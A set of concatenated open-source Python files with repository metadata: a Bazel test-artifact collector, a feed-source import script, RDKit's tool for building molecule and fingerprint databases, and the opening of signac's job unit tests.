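# discover_test_results(_EXAMPLE_BEP_DATA) would yield:
#   {"//foo:bar_test": {"test.log": ["/tmp/foo/bar_test/test.log"],
#                       "test.xml": ["/tmp/foo/bar_test/test.xml"],
#                       "status": "PASSED"}}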
def test_label_to_path(destination, label, attempt, file_name):
"""Converts a test label and test result file name to a path rooted in destination.
Args:
destination: Destination dir where test artifact will be copied
label: Test Label.
attempt: Run Attempt.
file_name: Original filename without a path (test.log or test.xml).
Returns:
New Path to be used for the file name.
"""
_, ext = os.path.splitext(file_name)
# remove leading //
path = label[2:]
path = path.replace("/", os.sep)
path = path.replace(":", os.sep)
if attempt == 0:
path = os.path.join(path, file_name)
else:
path = os.path.join(path, "attempt_{}{}".format(attempt, ext))
return os.path.join(destination, path)
def parse_arguments():
"""Parses command line arguments.
Returns:
Parsed arguments as an object.
"""
parser = argparse.ArgumentParser()
required = parser.add_argument_group("required arguments")
required.add_argument("--build-events", "-b", action="store", type=str,
help="Path to JSON Build Events File",
required=True)
required.add_argument("--destination", "-d", action="store", type=str,
help="Path to a destination directory for artifacts",
required=True)
return parser.parse_args()
def main():
args = parse_arguments()
artifacts = discover(args.build_events)
copied = copy_test_results(artifacts, args.destination)
n = sum(len(copied[item]) for item in copied)
print("{}: Collected {} artifacts for {} {}".format(
args.build_events, n, len(copied), TEST_RESULTS))
if __name__ == "__main__":
main()
| {
"content_hash": "ebc6d14611a5a30931865f305ee6ab68",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 85,
"avg_line_length": 34.19897959183673,
"alnum_prop": 0.6603013576010741,
"repo_name": "google/asylo",
"id": "1226447e596f703ea15615db4ac2dcf0944a8590",
"size": "6703",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buildkite/collect_artifacts.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "120094"
},
{
"name": "C++",
"bytes": "5876707"
},
{
"name": "Dockerfile",
"bytes": "2666"
},
{
"name": "HTML",
"bytes": "2522"
},
{
"name": "Java",
"bytes": "23045"
},
{
"name": "Python",
"bytes": "46063"
},
{
"name": "Shell",
"bytes": "43678"
},
{
"name": "Smarty",
"bytes": "41243"
},
{
"name": "Starlark",
"bytes": "708214"
}
],
"symlink_target": ""
} |
from collections import defaultdict
import re
import sys
import time
sys.path.append('../..')
from crawler.crawler import crawl, itemFactory
from engine.data.database.databaseConnection import commit, rollback
from engine.data.database.sourceTable import addSource, sourceExists, urlToLookupId
from engine.data.database.sourceGroupAssignmentTable import addSourceGroupAssignment
#from engine.data.database.itemTable import getSourceUrlsForItemUrl
from engine.data.url import Url
def handleLine(line):
# Parse line
m = lineParser.match(line.rstrip())
assert(m.lastindex == 1 or m.lastindex == 2)
url = Url(m.group(1))
sourceGroupName = None
if(m.lastindex == 2):
sourceGroupName = m.group(2)
# Add source
if not sourceExists(url):
print("Adding " + url.value)
webFeed = itemFactory(url)
#if not hasSimilarSource(webFeed):
addSource(url, webFeed.name)
sourceId = urlToLookupId(url.value)
crawl(webFeed, sourceId)
print "https://ps4m.com/s/%d" % (sourceId)
#else:
# print "NOT ADDING!"
# return
else:
print (url.value + " already exists")
# If nessecary, assign source to group
if(sourceGroupName is not None):
print "\tAdding to %s" % (sourceGroupName)
sourceId = urlToLookupId(url.value)
addSourceGroupAssignment(sourceId, sourceGroupName)
return
def usage():
message = """%s
NAME
addListOfSources - adds a file of source urls
SYNOPSIS
addListOfSources SOURCE_FILE
SOURCE_FILE -
Contains one url per line. Also optionally, a space then a source group.
""" % sys.argv[0]
print message
lineParser = re.compile("^(\S+)\s?(.+)?$")
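# Example SOURCE_FILE contents (illustrative; the URLs and group name are
# made up):
#   http://example.com/feed.xml
#   http://example.com/news.rss Gaming
# A line's optional second token names the source group the feed is added to.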
# XXX: Using this is taking too much time. Try using it again when we have an index
# in the database to make url lookup quicker.
def hasSimilarSource(webfeed):
duplicateUrlCounter = defaultdict(lambda:0)
for i in webfeed.items:
for sourceUrl in getSourceUrlsForItemUrl(i[1]):
duplicateUrlCounter[sourceUrl] += 1
# Print a warning, if any other webfeed has more than half of this webfeed
result = False
for c in duplicateUrlCounter.keys():
if (duplicateUrlCounter[c] > len(webfeed.items)/2):
print "Possible duplicate feed. New feed %s. Old feed: %s" % (webfeed.url, c)
result = True
return result
if(len(sys.argv) != 2):
usage()
exit(1)
sourceFilePath = sys.argv[1]
sourceFile = open(sourceFilePath, 'r')
problemLine = set()
for line in sourceFile:
try:
handleLine(line)
except Exception, e:
rollback()
print "fail %s: %s" % (line, e)
problemLine.add(line)
continue
print # Add a blank line between sources
commit()
time.sleep(1)
sourceFile.close()
# Report errors
if problemLine:
print 'Could not add the following lines:'
for i in problemLine:
print i
| {
"content_hash": "a0fa3d23a400c1e594e2db7eb15a2939",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 89,
"avg_line_length": 27.435185185185187,
"alnum_prop": 0.6635167060411745,
"repo_name": "TobyRoseman/PS4M",
"id": "b56c67727479f76e91c529f10efa5d8a14aab7a2",
"size": "2963",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "admin/scripts/addListOfSources.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2929"
},
{
"name": "JavaScript",
"bytes": "7712"
},
{
"name": "Mako",
"bytes": "6779"
},
{
"name": "Nginx",
"bytes": "1562"
},
{
"name": "Python",
"bytes": "53976"
},
{
"name": "Shell",
"bytes": "1566"
}
],
"symlink_target": ""
} |
_version = "0.13.0"
_description = """
NOTES:
- the property names for the database are the union of those for
all molecules.
- missing property values will be set to 'N/A', though this can be
changed with the --missingPropertyVal argument.
- The property names may be altered on loading the database. Any
non-alphanumeric character in a property name will be replaced
with '_'. e.g. "Gold.Goldscore.Constraint.Score" becomes
"Gold_Goldscore_Constraint_Score". This is important to know
when querying.
- Property names are not case sensitive in the database; this may
cause some problems if they are case sensitive in the sd file.
"""
import argparse
from rdkit import RDConfig
from rdkit import Chem
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.Dbase import DbModule
from rdkit.RDLogger import logger
from rdkit.Chem.MolDb import Loader
logger = logger()
import sys, os
import io
import pickle
from rdkit.Chem.MolDb.FingerprintUtils import BuildSigFactory, LayeredOptions
from rdkit.Chem.MolDb import FingerprintUtils
# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----
def initParser():
""" Initialize the command line parser """
parser = argparse.ArgumentParser(usage='CreateDB [optional arguments] <filename>',
description=_description,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('filename', nargs='?', help='File containg molecules to load into database')
parser.add_argument('--version', action='version', version='%(prog)s ' + _version)
parser.add_argument('--outDir', '--dbDir', default='', help='name of the output directory')
parser.add_argument('--molDbName', default='Compounds.sqlt', help='name of the molecule database')
parser.add_argument('--molIdName', default='compound_id', help='name of the database key column')
parser.add_argument('--regName', default='molecules', help='name of the molecular registry table')
parser.add_argument('--pairDbName', default='AtomPairs.sqlt', help='name of the atom pairs database')
parser.add_argument('--pairTableName', default='atompairs', help='name of the atom pairs table')
parser.add_argument('--fpDbName', default='Fingerprints.sqlt',
help='name of the 2D fingerprints database')
parser.add_argument('--fpTableName', default='rdkitfps', help='name of the 2D fingerprints table')
parser.add_argument('--layeredTableName', default='layeredfps',
help='name of the layered fingerprints table')
parser.add_argument('--descrDbName', default='Descriptors.sqlt',
help='name of the descriptor database')
parser.add_argument('--descrTableName', default='descriptors_v1', help='name of the descriptor table')
parser.add_argument('--descriptorCalcFilename', default=os.path.join(RDConfig.RDBaseDir, 'Projects',
'DbCLI', 'moe_like.dsc'),
help='name of the file containing the descriptor calculator')
parser.add_argument('--errFilename', default='loadErrors.txt',
help='name of the file to contain information about molecules that fail to load')
parser.add_argument('--noPairs', default=True, dest='doPairs', action='store_false',
help='skip calculating atom pairs')
parser.add_argument('--noFingerprints', default=True, dest='doFingerprints', action='store_false',
help='skip calculating 2D fingerprints')
parser.add_argument('--noLayeredFps', default=True, dest='doLayered', action='store_false',
help='skip calculating layered fingerprints')
parser.add_argument('--noDescriptors', default=True, dest='doDescriptors', action='store_false',
help='skip calculating descriptors')
parser.add_argument('--noProps', default=False, dest='skipProps', action='store_true',
help="don't include molecular properties in the database")
parser.add_argument('--noSmiles', default=False, dest='skipSmiles', action='store_true',
help="don't include SMILES in the database (can make loading somewhat faster)")
parser.add_argument('--maxRowsCached', default=-1,
help="maximum number of rows to cache before doing a database commit")
parser.add_argument('--silent', default=False, action='store_true',
help='do not provide status messages')
parser.add_argument('--molFormat', default='', choices=('smiles', 'sdf', ''),
help='specify the format of the input file')
parser.add_argument(
'--nameProp', default='_Name',
help='specify the SD property to be used for the molecule names. Default is to use the mol block name')
parser.add_argument(
'--missingPropertyVal', default='N/A',
help='value to insert in the database if a property value is missing. Default is %(default)s.')
parser.add_argument('--addProps', default=False, action='store_true',
help='add computed properties to the output')
parser.add_argument('--noExtras', default=False, action='store_true',
help='skip all non-molecule databases')
parser.add_argument('--skipLoad', '--skipMols', action="store_false", dest='loadMols', default=True,
help='skip the molecule loading (assumes mol db already exists)')
parser.add_argument('--updateDb', '--update', default=False, action='store_true',
help='add to an existing database')
parser.add_argument('--doPharm2D', default=False, action='store_true',
                      help='calculate Pharm2D fingerprints')
parser.add_argument('--pharm2DTableName', default='pharm2dfps',
help='name of the Pharm2D fingerprints table')
parser.add_argument('--fdefFile', '--fdef',
default=os.path.join(RDConfig.RDDataDir, 'Novartis1.fdef'),
help='provide the name of the fdef file to use for 2d pharmacophores')
parser.add_argument('--doGobbi2D', default=False, action='store_true',
                      help='calculate Gobbi 2D fingerprints')
parser.add_argument('--gobbi2DTableName', default='gobbi2dfps',
help='name of the Gobbi 2D fingerprints table')
parser.add_argument('--noMorganFps', '--noCircularFps', default=True, dest='doMorganFps',
action='store_false', help='skip calculating Morgan (circular) fingerprints')
parser.add_argument('--morganFpTableName', default='morganfps',
help='name of the Morgan fingerprints table')
parser.add_argument('--delimiter', '--delim', default=' ', help='the delimiter in the input file')
parser.add_argument('--titleLine', default=False, action='store_true',
help='the input file contains a title line')
parser.add_argument('--smilesColumn', '--smilesCol', default=0, type=int,
help='the column index with smiles')
parser.add_argument('--nameColumn', '--nameCol', default=1, type=int,
help='the column index with mol names')
return parser
def CreateDb(options, dataFilename='', supplier=None):
if not dataFilename and supplier is None:
raise ValueError('Please provide either a data filename or a supplier')
if options.errFilename:
errFile = open(os.path.join(options.outDir, options.errFilename), 'w+')
else:
errFile = None
if options.noExtras:
options.doPairs = False
options.doDescriptors = False
options.doFingerprints = False
options.doPharm2D = False
options.doGobbi2D = False
options.doLayered = False
options.doMorganFps = False
if options.loadMols:
if supplier is None:
if not options.molFormat:
ext = os.path.splitext(dataFilename)[-1].lower()
if ext == '.sdf':
options.molFormat = 'sdf'
elif ext in ('.smi', '.smiles', '.txt', '.csv'):
options.molFormat = 'smiles'
if not options.delimiter:
# guess the delimiter
import csv
sniffer = csv.Sniffer()
dlct = sniffer.sniff(open(dataFilename, 'r').read(2000))
options.delimiter = dlct.delimiter
if not options.silent:
logger.info(
'Guessing that delimiter is %s. Use --delimiter argument if this is wrong.' %
repr(options.delimiter))
if not options.silent:
logger.info('Guessing that mol format is %s. Use --molFormat argument if this is wrong.' %
repr(options.molFormat))
if options.molFormat == 'smiles':
if options.delimiter == '\\t':
options.delimiter = '\t'
supplier = Chem.SmilesMolSupplier(
dataFilename, titleLine=options.titleLine, delimiter=options.delimiter,
smilesColumn=options.smilesColumn, nameColumn=options.nameColumn)
else:
supplier = Chem.SDMolSupplier(dataFilename)
if not options.silent:
logger.info('Reading molecules and constructing molecular database.')
Loader.LoadDb(supplier, os.path.join(options.outDir, options.molDbName), errorsTo=errFile,
regName=options.regName, nameCol=options.molIdName, skipProps=options.skipProps,
defaultVal=options.missingPropertyVal, addComputedProps=options.addProps,
uniqNames=True, skipSmiles=options.skipSmiles,
maxRowsCached=int(options.maxRowsCached), silent=options.silent,
nameProp=options.nameProp, lazySupplier=int(options.maxRowsCached) > 0,
startAnew=not options.updateDb)
if options.doPairs:
pairConn = DbConnect(os.path.join(options.outDir, options.pairDbName))
pairCurs = pairConn.GetCursor()
try:
pairCurs.execute('drop table %s' % (options.pairTableName))
except Exception:
pass
pairCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,atompairfp blob,torsionfp blob)'
% (options.pairTableName, options.molIdName))
if options.doFingerprints or options.doPharm2D or options.doGobbi2D or options.doLayered:
fpConn = DbConnect(os.path.join(options.outDir, options.fpDbName))
fpCurs = fpConn.GetCursor()
try:
fpCurs.execute('drop table %s' % (options.fpTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.pharm2DTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.gobbi2DTableName))
except Exception:
pass
try:
fpCurs.execute('drop table %s' % (options.layeredTableName))
except Exception:
pass
if options.doFingerprints:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,rdkfp blob)'
% (options.fpTableName, options.molIdName))
if options.doLayered:
layeredQs = ','.join('?' * LayeredOptions.nWords)
colDefs = ','.join(['Col_%d integer' % (x + 1) for x in range(LayeredOptions.nWords)])
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,%s)' % (
options.layeredTableName, options.molIdName, colDefs))
if options.doPharm2D:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,pharm2dfp blob)'
% (options.pharm2DTableName, options.molIdName))
sigFactory = BuildSigFactory(options)
if options.doGobbi2D:
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,gobbi2dfp blob)'
% (options.gobbi2DTableName, options.molIdName))
from rdkit.Chem.Pharm2D import Generate, Gobbi_Pharm2D
if options.doMorganFps:
fpConn = DbConnect(os.path.join(options.outDir, options.fpDbName))
fpCurs = fpConn.GetCursor()
try:
fpCurs.execute('drop table %s' % (options.morganFpTableName))
except Exception:
pass
fpCurs.execute(
'create table %s (guid integer not null primary key,%s varchar not null unique,morganfp blob)'
% (options.morganFpTableName, options.molIdName))
if options.doDescriptors:
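    # the descriptor calculator was serialized with pickle; its descriptor
    # names become the float columns of the descriptor table created below
    # (the guid and molecule id columns come first)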
descrConn = DbConnect(os.path.join(options.outDir, options.descrDbName))
with open(options.descriptorCalcFilename, 'r') as inTF:
buf = inTF.read().replace('\r\n', '\n').encode('utf-8')
calc = pickle.load(io.BytesIO(buf))
nms = [x for x in calc.GetDescriptorNames()]
descrCurs = descrConn.GetCursor()
descrs = ['guid integer not null primary key', '%s varchar not null unique' % options.molIdName]
descrs.extend(['%s float' % x for x in nms])
try:
descrCurs.execute('drop table %s' % (options.descrTableName))
except Exception:
pass
descrCurs.execute('create table %s (%s)' % (options.descrTableName, ','.join(descrs)))
descrQuery = ','.join([DbModule.placeHolder] * len(descrs))
pairRows = []
fpRows = []
layeredRows = []
descrRows = []
pharm2DRows = []
gobbi2DRows = []
morganRows = []
if not options.silent:
logger.info('Generating fingerprints and descriptors:')
molConn = DbConnect(os.path.join(options.outDir, options.molDbName))
molCurs = molConn.GetCursor()
if not options.skipSmiles:
molCurs.execute('select guid,%s,smiles,molpkl from %s' % (options.molIdName, options.regName))
else:
molCurs.execute('select guid,%s,molpkl from %s' % (options.molIdName, options.regName))
i = 0
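  # walk the molecule table row by row, computing whichever fingerprints and
  # descriptors were requested; the accumulated rows are flushed to their
  # databases in batches inside the loop (every 500 molecules) and once more
  # after the loop ends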
while 1:
try:
tpl = molCurs.fetchone()
molGuid = tpl[0]
molId = tpl[1]
pkl = tpl[-1]
i += 1
except Exception:
break
if isinstance(pkl, (bytes, str)):
mol = Chem.Mol(pkl)
else:
mol = Chem.Mol(str(pkl))
if not mol:
continue
if options.doPairs:
pairs = FingerprintUtils.BuildAtomPairFP(mol)
torsions = FingerprintUtils.BuildTorsionsFP(mol)
pkl1 = DbModule.binaryHolder(pairs.ToBinary())
pkl2 = DbModule.binaryHolder(torsions.ToBinary())
row = (molGuid, molId, pkl1, pkl2)
pairRows.append(row)
if options.doFingerprints:
fp2 = FingerprintUtils.BuildRDKitFP(mol)
pkl = DbModule.binaryHolder(fp2.ToBinary())
row = (molGuid, molId, pkl)
fpRows.append(row)
if options.doLayered:
words = LayeredOptions.GetWords(mol)
row = [molGuid, molId] + words
layeredRows.append(row)
if options.doDescriptors:
descrs = calc.CalcDescriptors(mol)
row = [molGuid, molId]
row.extend(descrs)
descrRows.append(row)
if options.doPharm2D:
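      # BuildPharm2DFP picks up the module-level sigFactory, so point it at
      # the factory built from the fdef file before generating the fingerprint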
FingerprintUtils.sigFactory = sigFactory
fp = FingerprintUtils.BuildPharm2DFP(mol)
pkl = DbModule.binaryHolder(fp.ToBinary())
row = (molGuid, molId, pkl)
pharm2DRows.append(row)
if options.doGobbi2D:
FingerprintUtils.sigFactory = Gobbi_Pharm2D.factory
fp = FingerprintUtils.BuildPharm2DFP(mol)
pkl = DbModule.binaryHolder(fp.ToBinary())
row = (molGuid, molId, pkl)
gobbi2DRows.append(row)
if options.doMorganFps:
morgan = FingerprintUtils.BuildMorganFP(mol)
pkl = DbModule.binaryHolder(morgan.ToBinary())
row = (molGuid, molId, pkl)
morganRows.append(row)
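    # every 500 molecules, flush the accumulated rows and commit so that
    # memory use stays bounded for large inputs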
if not i % 500:
if len(pairRows):
pairCurs.executemany('insert into %s values (?,?,?,?)' % options.pairTableName, pairRows)
pairRows = []
pairConn.Commit()
if len(fpRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.fpTableName, fpRows)
fpRows = []
fpConn.Commit()
if len(layeredRows):
fpCurs.executemany('insert into %s values (?,?,%s)' % (options.layeredTableName, layeredQs),
layeredRows)
layeredRows = []
fpConn.Commit()
if len(descrRows):
descrCurs.executemany('insert into %s values (%s)' % (options.descrTableName, descrQuery),
descrRows)
descrRows = []
descrConn.Commit()
if len(pharm2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.pharm2DTableName, pharm2DRows)
pharm2DRows = []
fpConn.Commit()
if len(gobbi2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.gobbi2DTableName, gobbi2DRows)
gobbi2DRows = []
fpConn.Commit()
if len(morganRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.morganFpTableName, morganRows)
morganRows = []
fpConn.Commit()
if not options.silent and not i % 500:
logger.info(' Done: %d' % (i))
if len(pairRows):
pairCurs.executemany('insert into %s values (?,?,?,?)' % options.pairTableName, pairRows)
pairRows = []
pairConn.Commit()
if len(fpRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.fpTableName, fpRows)
fpRows = []
fpConn.Commit()
if len(layeredRows):
fpCurs.executemany('insert into %s values (?,?,%s)' % (options.layeredTableName, layeredQs),
layeredRows)
layeredRows = []
fpConn.Commit()
if len(descrRows):
descrCurs.executemany('insert into %s values (%s)' % (options.descrTableName, descrQuery),
descrRows)
descrRows = []
descrConn.Commit()
if len(pharm2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.pharm2DTableName, pharm2DRows)
pharm2DRows = []
fpConn.Commit()
if len(gobbi2DRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.gobbi2DTableName, gobbi2DRows)
gobbi2DRows = []
fpConn.Commit()
if len(morganRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.morganFpTableName, morganRows)
morganRows = []
fpConn.Commit()
if not options.silent:
logger.info('Finished.')
if __name__ == '__main__':
parser = initParser()
options = parser.parse_args()
if options.loadMols:
if options.filename is None:
parser.error('please provide a filename argument')
dataFilename = options.filename
try:
dataFile = open(dataFilename, 'r')
except IOError:
logger.error('input file %s does not exist' % (dataFilename))
      sys.exit(1)
dataFile = None
if not options.outDir:
prefix = os.path.splitext(dataFilename)[0]
options.outDir = prefix
if not os.path.exists(options.outDir):
try:
os.mkdir(options.outDir)
except Exception:
logger.error('could not create output directory %s' % options.outDir)
sys.exit(1)
if 1:
CreateDb(options, dataFilename)
else:
import cProfile
cProfile.run("CreateDb(options,dataFilename)", "create.prof")
import pstats
p = pstats.Stats('create.prof')
p.strip_dirs().sort_stats('cumulative').print_stats(25)
| {
"content_hash": "f85783a69c80ea6e32234adbdfe8bcb3",
"timestamp": "",
"source": "github",
"line_count": 442,
"max_line_length": 117,
"avg_line_length": 43.047511312217196,
"alnum_prop": 0.649760866137594,
"repo_name": "ptosco/rdkit",
"id": "f62f855dfad88d176fb47373cbb215dd457fedeb",
"size": "20726",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Projects/DbCLI/CreateDb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1595174"
},
{
"name": "C#",
"bytes": "10167"
},
{
"name": "C++",
"bytes": "13851292"
},
{
"name": "CMake",
"bytes": "761863"
},
{
"name": "Dockerfile",
"bytes": "2590"
},
{
"name": "Fortran",
"bytes": "7590"
},
{
"name": "HTML",
"bytes": "43059702"
},
{
"name": "Java",
"bytes": "369457"
},
{
"name": "JavaScript",
"bytes": "54009"
},
{
"name": "Jupyter Notebook",
"bytes": "498341"
},
{
"name": "LLVM",
"bytes": "40048"
},
{
"name": "Lex",
"bytes": "4508"
},
{
"name": "Makefile",
"bytes": "10862"
},
{
"name": "Python",
"bytes": "4157348"
},
{
"name": "QMake",
"bytes": "389"
},
{
"name": "SMT",
"bytes": "3010"
},
{
"name": "SWIG",
"bytes": "342569"
},
{
"name": "Shell",
"bytes": "3822"
},
{
"name": "Smarty",
"bytes": "5864"
},
{
"name": "Yacc",
"bytes": "61677"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import unittest
import os
import io
import warnings
import logging
import uuid
import copy
import random
import json
import signac.contrib
import signac.common.config
from signac.common import six
from signac.errors import DestinationExistsError
from signac.errors import JobsCorruptedError
if six.PY2:
from tempdir import TemporaryDirectory
else:
from tempfile import TemporaryDirectory
# Make sure the jobs created for this test are unique.
test_token = {'test_token': str(uuid.uuid4())}
warnings.simplefilter('default')
warnings.filterwarnings('error', category=DeprecationWarning, module='signac')
warnings.filterwarnings(
'ignore', category=PendingDeprecationWarning, message=r'.*Cache API.*')
BUILTINS = [
({'e': [1.0, '1.0', 1, True]}, '4d8058a305b940005be419b30e99bb53'),
({'d': True}, '33cf9999de25a715a56339c6c1b28b41'),
({'f': (1.0, '1.0', 1, True)}, 'e998db9b595e170bdff936f88ccdbf75'),
({'a': 1}, '42b7b4f2921788ea14dac5566e6f06d0'),
({'c': '1.0'}, '80fa45716dd3b83fa970877489beb42e'),
({'b': 1.0}, '0ba6c5a46111313f11c41a6642520451'),
]
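# builtins_dict() merges the BUILTINS state points in shuffled order; the
# tests below rely on the resulting job id (BUILTINS_HASH) being independent
# of key insertion order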
def builtins_dict():
random.shuffle(BUILTINS)
d = dict()
for b in BUILTINS:
d.update(b[0])
return d
BUILTINS_HASH = '7a80b58db53bbc544fc27fcaaba2ce44'
NESTED_HASH = 'bd6f5828f4410b665bffcec46abeb8f3'
def config_from_cfg(cfg):
cfile = io.StringIO('\n'.join(cfg))
return signac.common.config.get_config(cfile)
def testdata():
return str(uuid.uuid4())
class BaseJobTest(unittest.TestCase):
project_class = signac.Project
def setUp(self):
self._tmp_dir = TemporaryDirectory(prefix='signac_')
self.addCleanup(self._tmp_dir.cleanup)
self._tmp_pr = os.path.join(self._tmp_dir.name, 'pr')
self._tmp_wd = os.path.join(self._tmp_dir.name, 'wd')
os.mkdir(self._tmp_pr)
self.config = signac.common.config.load_config()
self.project = self.project_class.init_project(
name='testing_test_project',
root=self._tmp_pr,
workspace=self._tmp_wd)
self.project.config['default_host'] = 'testing'
def tearDown(self):
pass
def open_job(self, *args, **kwargs):
project = self.project
return project.open_job(*args, **kwargs)
@classmethod
    def nested_dict(cls):
d = dict(builtins_dict())
d['g'] = builtins_dict()
return d
class JobIDTest(BaseJobTest):
def test_builtins(self):
for p, h in BUILTINS:
self.assertEqual(str(self.project.open_job(p)), h)
self.assertEqual(
str(self.project.open_job(builtins_dict())), BUILTINS_HASH)
def test_shuffle(self):
for i in range(10):
self.assertEqual(
str(self.project.open_job(builtins_dict())), BUILTINS_HASH)
def test_nested(self):
for i in range(10):
self.assertEqual(
str(self.project.open_job(self.nested_dict())), NESTED_HASH)
def test_sequences_identity(self):
job1 = self.project.open_job({'a': [1.0, '1.0', 1, True]})
job2 = self.project.open_job({'a': (1.0, '1.0', 1, True)})
self.assertEqual(str(job1), str(job2))
self.assertEqual(job1.statepoint(), job2.statepoint())
class JobTest(BaseJobTest):
def test_repr(self):
job = self.project.open_job({'a': 0})
job2 = self.project.open_job({'a': 0})
self.assertEqual(repr(job), repr(job2))
self.assertEqual(job, job2)
def test_str(self):
job = self.project.open_job({'a': 0})
self.assertEqual(str(job), job.get_id())
def test_isfile(self):
job = self.project.open_job({'a': 0})
fn = 'test.txt'
fn_ = os.path.join(job.workspace(), fn)
self.assertFalse(job.isfile(fn))
job.init()
self.assertFalse(job.isfile(fn))
with open(fn_, 'w') as file:
file.write('hello')
self.assertTrue(job.isfile(fn))
class JobSPInterfaceTest(BaseJobTest):
def test_interface_read_only(self):
sp = self.nested_dict()
job = self.open_job(sp)
self.assertEqual(job.statepoint(), json.loads(json.dumps(sp)))
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp, x), sp[x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp.g, x), sp['g'][x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(job.sp.get(x), sp[x])
self.assertEqual(job.sp.get(x), sp[x])
self.assertEqual(job.sp.g.get(x), sp['g'][x])
self.assertIsNone(job.sp.get('not_in_sp'))
self.assertIsNone(job.sp.g.get('not_in_sp'))
self.assertIsNone(job.sp.get('not_in_sp', None))
self.assertIsNone(job.sp.g.get('not_in_sp', None))
self.assertEqual(job.sp.get('not_in_sp', 23), 23)
self.assertEqual(job.sp.g.get('not_in_sp', 23), 23)
def test_interface_contains(self):
sp = self.nested_dict()
job = self.open_job(sp)
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertIn(x, job.sp)
self.assertIn(x, job.sp.g)
def test_interface_read_write(self):
sp = self.nested_dict()
job = self.open_job(sp)
job.init()
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp, x), sp[x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp.g, x), sp['g'][x])
self.assertEqual(job.sp[x], sp[x])
l = [1, 1.0, '1.0', True, None]
b = list(l) + [l] + [tuple(l)]
for v in b:
for x in ('a', 'b', 'c', 'd', 'e'):
setattr(job.sp, x, v)
self.assertEqual(getattr(job.sp, x), v)
setattr(job.sp.g, x, v)
self.assertEqual(getattr(job.sp.g, x), v)
def test_interface_nested_kws(self):
job = self.open_job({'a.b.c': 0})
self.assertEqual(job.sp['a.b.c'], 0)
with self.assertRaises(AttributeError):
job.sp.a.b.c
job.sp['a.b.c'] = 1
self.assertEqual(job.sp['a.b.c'], 1)
job.sp.a = dict(b=dict(c=2))
self.assertEqual(job.sp.a.b.c, 2)
self.assertEqual(job.sp['a']['b']['c'], 2)
def test_interface_reserved_keywords(self):
job = self.open_job({'with': 0, 'pop': 1})
self.assertEqual(job.sp['with'], 0)
self.assertEqual(job.sp['pop'], 1)
self.assertEqual(job.sp.pop('with'), 0)
self.assertNotIn('with', job.sp)
def test_interface_illegal_type(self):
job = self.open_job(dict(a=0))
self.assertEqual(job.sp.a, 0)
class Foo(object):
pass
with self.assertRaises(TypeError):
job.sp.a = Foo()
def test_interface_rename(self):
job = self.open_job(dict(a=0))
job.init()
self.assertEqual(job.sp.a, 0)
job.sp.b = job.sp.pop('a')
self.assertNotIn('a', job.sp)
self.assertEqual(job.sp.b, 0)
def test_interface_add(self):
job = self.open_job(dict(a=0))
job.init()
with self.assertRaises(AttributeError):
job.sp.b
job.sp.b = 1
self.assertIn('b', job.sp)
self.assertEqual(job.sp.b, 1)
def test_interface_delete(self):
job = self.open_job(dict(a=0, b=0))
job.init()
self.assertIn('b', job.sp)
self.assertEqual(job.sp.b, 0)
del job.sp['b']
self.assertNotIn('b', job.sp)
with self.assertRaises(AttributeError):
job.sp.b
def test_interface_destination_conflict(self):
job_a = self.open_job(dict(a=0))
job_b = self.open_job(dict(b=0))
job_a.init()
id_a = job_a.get_id()
job_a.sp = dict(b=0)
self.assertEqual(job_a.statepoint(), dict(b=0))
self.assertEqual(job_a, job_b)
self.assertNotEqual(job_a.get_id(), id_a)
job_a = self.open_job(dict(a=0))
# Moving to existing job, no problem while empty:
self.assertNotEqual(job_a, job_b)
job_a.sp = dict(b=0)
job_a = self.open_job(dict(a=0))
job_b.init()
# Moving to an existing job with data leads
# to an error:
job_a.document['a'] = 0
job_b.document['a'] = 0
self.assertNotEqual(job_a, job_b)
with self.assertRaises(RuntimeError):
job_a.sp = dict(b=0)
with self.assertRaises(DestinationExistsError):
job_a.sp = dict(b=0)
def test_interface_multiple_changes(self):
for i in range(1, 4):
job = self.project.open_job(dict(a=i))
job.init()
for job in self.project:
self.assertTrue(job.sp.a > 0)
for job in self.project:
obj_id = id(job)
id0 = job.get_id()
sp0 = job.statepoint()
self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a > 0)
self.assertEqual(job.get_id(), id0)
self.assertEqual(job.sp, sp0)
job.sp.a = - job.sp.a
self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a < 0)
self.assertNotEqual(job.get_id(), id0)
self.assertNotEqual(job.sp, sp0)
job.sp.a = - job.sp.a
